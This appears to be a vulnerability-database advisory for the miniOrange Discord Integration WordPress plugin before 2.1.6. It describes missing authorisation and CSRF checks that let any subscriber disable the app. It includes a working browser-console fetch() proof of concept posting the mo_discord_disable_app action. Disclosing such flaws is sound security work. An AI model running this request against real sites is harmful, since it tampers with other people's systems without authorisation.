Lucene search

K
wpexploitLana CodesWPEX-ID:A91D0501-C2A9-4C6C-B5DA-B3FC29442A4F
HistorySep 26, 2022 - 12:00 a.m.

miniOrange Discord Integration < 2.1.6 - Subscriber+ App Disabling

2022-09-2600:00:00
Lana Codes
278
wordpress
security
developer console

EPSS

0.001

Percentile

23.8%

The plugin does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example

Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=mo_discord_disable_app&app_name=test',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

EPSS

0.001

Percentile

23.8%

Related for WPEX-ID:A91D0501-C2A9-4C6C-B5DA-B3FC29442A4F